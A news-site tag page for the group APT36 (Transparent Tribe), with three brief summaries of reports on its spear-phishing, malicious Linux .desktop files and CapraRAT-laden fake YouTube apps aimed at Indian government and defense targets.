All articles tagged with #apt36
The Pakistani-linked threat group Transparent Tribe (APT36) is targeting Indian government entities using sophisticated spear-phishing campaigns and weaponized desktop shortcuts on Windows and Linux systems to deploy malware, steal credentials, and maintain persistent access.
Pakistani APT36 hackers are exploiting Linux .desktop files to deliver malware and conduct espionage against Indian government and defense targets, using phishing emails with disguised malicious files that execute hidden commands, establishing persistent access and exfiltrating data, indicating evolving and sophisticated tactics.
The APT36 hacking group, also known as Transparent Tribe, has been using fake YouTube apps to infect Android devices with their remote access trojan (RAT), CapraRAT. Once installed, the malware can collect data, record audio and video, and access sensitive information. APT36 primarily targets Indian defense and government entities, as well as individuals involved in Kashmir region affairs and human rights activism in Pakistan. The malicious apps are distributed outside of Google Play and request risky permissions during installation. Despite their weak operational security, APT36's continuous development of new apps allows them to consistently reach new potential victims.